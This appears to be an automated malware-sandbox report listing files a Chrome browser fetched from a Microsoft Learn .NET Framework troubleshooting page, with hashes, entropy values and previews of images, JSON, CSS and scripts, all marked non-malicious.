                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):464328
                                                                                                                                                                        Entropy (8bit):5.074669864961383
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                        MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                        SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                        SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                        SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                        Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):207935
                                                                                                                                                                        Entropy (8bit):5.420780972514107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                        MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                        SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                        SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                        SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25441
                                                                                                                                                                        Entropy (8bit):5.152769469811509
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                        MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                        SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                        SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                        SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):207935
                                                                                                                                                                        Entropy (8bit):5.420780972514107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                        MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                        SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                        SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                        SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):25441
                                                                                                                                                                        Entropy (8bit):5.152769469811509
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                        MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                        SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                        SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                        SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
